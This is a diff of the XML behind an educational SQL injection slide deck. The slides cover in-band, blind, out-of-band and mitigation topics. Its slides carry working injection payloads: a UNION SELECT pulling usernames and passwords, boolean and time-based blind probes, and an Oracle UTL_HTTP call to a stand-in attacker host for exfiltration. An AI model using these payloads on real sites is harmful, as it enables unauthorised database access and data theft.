             <a:off x="5577840" y="4389120"/>
-            <a:ext cx="866520" cy="331200"/>
+            <a:ext cx="866160" cy="330840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5105,9 +4583,20 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
         <p:txBody>
           <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
           <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
             <a:r>
               <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                 <a:solidFill>
@@ -5125,14 +4614,14 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="93" name="TextShape 7"/>
-          <p:cNvSpPr txBox="1"/>
+          <p:cNvPr id="87" name="CustomShape 7"/>
+          <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="4480560" y="5063760"/>
-            <a:ext cx="3200400" cy="331200"/>
+            <a:ext cx="3200040" cy="330840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5142,19 +4631,79 @@
             <a:noFill/>
           </a:ln>
         </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
         <p:txBody>
           <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
           <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike" u="sng">
+                <a:solidFill>
+                  <a:srgbClr val="0563c1"/>
+                </a:solidFill>
+                <a:uFillTx/>
+                <a:latin typeface="Inconsolata"/>
+                <a:hlinkClick r:id="rId1"/>
+              </a:rPr>
+              <a:t>www.site.com/?id=1</a:t>
+            </a:r>
             <a:r>
               <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                 <a:solidFill>
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
-                <a:hlinkClick r:id="rId1"/>
-              </a:rPr>
-              <a:t>www.site.com/?id=1</a:t>
-            </a:r>
+              </a:rPr>
+              <a:t> and 1=1</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="88" name="CustomShape 8"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2743200" y="5577840"/>
+            <a:ext cx="7223400" cy="571680"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
             <a:r>
               <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                 <a:solidFill>
@@ -5162,53 +4711,10 @@
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
               </a:rPr>
-              <a:t> and 1=1</a:t>
+              <a:t>select item, description from products where id = 1 and 1=1</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="94" name="TextShape 8"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2743200" y="5577840"/>
-            <a:ext cx="7223760" cy="572040"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
-          <a:p>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>select item, description from products where id = 1 and 1=1</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="00ff00"/>
-              </a:solidFill>
-              <a:latin typeface="Inconsolata"/>
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -5264,14 +4770,14 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="95" name="CustomShape 1"/>
+          <p:cNvPr id="89" name="CustomShape 1"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
             <a:off x="182880" y="182880"/>
-            <a:ext cx="1776960" cy="364680"/>
+            <a:ext cx="1776600" cy="364320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5301,11 +4807,251 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>In-Band SQLi</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="90" name="TextShape 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3017520" y="1097280"/>
+            <a:ext cx="6492240" cy="602280"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>In-band; where the results are returned in the response</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:solidFill>
+                <a:srgbClr val="00ff00"/>
+              </a:solidFill>
+              <a:latin typeface="Inconsolata"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="91" name="TextShape 3"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2103120" y="1958040"/>
+            <a:ext cx="8138160" cy="602280"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>site.com/products?id=1 and union select username, password from users</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:solidFill>
+                <a:srgbClr val="00ff00"/>
+              </a:solidFill>
+              <a:latin typeface="Inconsolata"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="92" name="TextShape 4"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3749040" y="2829240"/>
+            <a:ext cx="4754880" cy="2017080"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>+-------------------------------------+</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:solidFill>
+                <a:srgbClr val="00ff00"/>
+              </a:solidFill>
+              <a:latin typeface="Inconsolata"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>| product             | stockcount    |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:solidFill>
+                <a:srgbClr val="00ff00"/>
+              </a:solidFill>
+              <a:latin typeface="Inconsolata"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>+-------------------------------------+</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:solidFill>
+                <a:srgbClr val="00ff00"/>
+              </a:solidFill>
+              <a:latin typeface="Inconsolata"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>| Model Car           | 342           |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:solidFill>
+                <a:srgbClr val="00ff00"/>
+              </a:solidFill>
+              <a:latin typeface="Inconsolata"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>| vortex              | password1     |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:solidFill>
+                <a:srgbClr val="00ff00"/>
+              </a:solidFill>
+              <a:latin typeface="Inconsolata"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>| syn0                | synisgod      |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:solidFill>
+                <a:srgbClr val="00ff00"/>
+              </a:solidFill>
+              <a:latin typeface="Inconsolata"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>| vputin              | ilovetrump    |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:solidFill>
+                <a:srgbClr val="00ff00"/>
+              </a:solidFill>
+              <a:latin typeface="Inconsolata"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>+-------------------------------------+</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:solidFill>
+                <a:srgbClr val="00ff00"/>
+              </a:solidFill>
+              <a:latin typeface="Inconsolata"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -5361,14 +5107,14 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="96" name="CustomShape 1"/>
+          <p:cNvPr id="93" name="CustomShape 1"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="431640" y="277560"/>
-            <a:ext cx="5105880" cy="364680"/>
+            <a:off x="182880" y="182880"/>
+            <a:ext cx="1671480" cy="364320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5398,8 +5144,266 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>Blind SQLi</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="94" name="TextShape 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="5212080" y="766080"/>
+            <a:ext cx="1828800" cy="331200"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Boolean blind</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:solidFill>
+                <a:srgbClr val="00ff00"/>
+              </a:solidFill>
+              <a:latin typeface="Inconsolata"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="95" name="TextShape 3"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="5029200" y="3417840"/>
+            <a:ext cx="2011680" cy="331200"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Time based blind</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:solidFill>
+                <a:srgbClr val="00ff00"/>
+              </a:solidFill>
+              <a:latin typeface="Inconsolata"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="96" name="TextShape 4"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3749040" y="1226520"/>
+            <a:ext cx="4480560" cy="602280"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>site.com/products?id=1 and 1=1 (TRUE)</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:solidFill>
+                <a:srgbClr val="00ff00"/>
+              </a:solidFill>
+              <a:latin typeface="Inconsolata"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="97" name="TextShape 5"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3749040" y="1737360"/>
+            <a:ext cx="4846320" cy="602280"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>site.com/products?id=1 and 1=2 (FALSE)</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:solidFill>
+                <a:srgbClr val="00ff00"/>
+              </a:solidFill>
+              <a:latin typeface="Inconsolata"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="98" name="TextShape 6"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2194560" y="4124880"/>
+            <a:ext cx="8321040" cy="812880"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>site.com/products?id=1 and if(mid(version(),1,1) = '5', sleep(15), 0) </a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:solidFill>
+                <a:srgbClr val="00ff00"/>
+              </a:solidFill>
+              <a:latin typeface="Inconsolata"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="99" name="TextShape 7"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4663440" y="2286000"/>
+            <a:ext cx="2743200" cy="457200"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="100" name="TextShape 8"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3111120" y="2286000"/>
+            <a:ext cx="6124320" cy="331200"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>site.com/products?id=1' and substr(user(), 1,1) = 'a</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
@@ -5458,14 +5462,14 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="97" name="CustomShape 1"/>
+          <p:cNvPr id="101" name="CustomShape 1"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1130040" y="657720"/>
-            <a:ext cx="2650320" cy="364680"/>
+            <a:off x="411120" y="308160"/>
+            <a:ext cx="3718440" cy="364320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5495,8 +5499,9 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>Error Based SQLi</a:t>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>Out of Band SQLi</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
@@ -5555,14 +5560,14 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="98" name="CustomShape 1"/>
+          <p:cNvPr id="102" name="CustomShape 1"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="411120" y="308160"/>
-            <a:ext cx="3718800" cy="364680"/>
+            <a:off x="400680" y="246600"/>
+            <a:ext cx="3184200" cy="364320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5592,8 +5597,9 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>Out of Band SQLi</a:t>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>Mitigation of SQLi</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
@@ -5652,14 +5658,14 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="99" name="CustomShape 1"/>
+          <p:cNvPr id="103" name="CustomShape 1"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="400680" y="246600"/>
-            <a:ext cx="3184560" cy="364680"/>
+            <a:off x="3791160" y="3051360"/>
+            <a:ext cx="3502800" cy="364320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5689,8 +5695,9 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>Mitigation of SQLi</a:t>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>select dinner from mealtimes;</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>

--- a/slides/SQLi-Preso.pptx
+++ b/slides/SQLi-Preso.pptx
@@ -3392,7 +3392,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="104" name="CustomShape 1"/>
+          <p:cNvPr id="111" name="CustomShape 1"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
@@ -3650,7 +3650,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="105" name="CustomShape 1"/>
+          <p:cNvPr id="112" name="CustomShape 1"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
@@ -5468,7 +5468,7 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="411120" y="308160"/>
+            <a:off x="213480" y="184320"/>
             <a:ext cx="3718440" cy="364320"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
@@ -5505,6 +5505,83 @@
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="102" name="TextShape 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1097280" y="2286000"/>
+            <a:ext cx="9439200" cy="331200"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>site.com/products?id=1||UTL_HTTP.request('http://test.attacker.com/') – (Oracle) </a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="103" name="TextShape 3"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2103120" y="925560"/>
+            <a:ext cx="7863840" cy="572040"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:p>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Executing SQL queries to exfiltrate data to an external service</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:solidFill>
+                <a:srgbClr val="00ff00"/>
+              </a:solidFill>
+              <a:latin typeface="Inconsolata"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -5560,7 +5637,7 @@
       </p:grpSpPr>
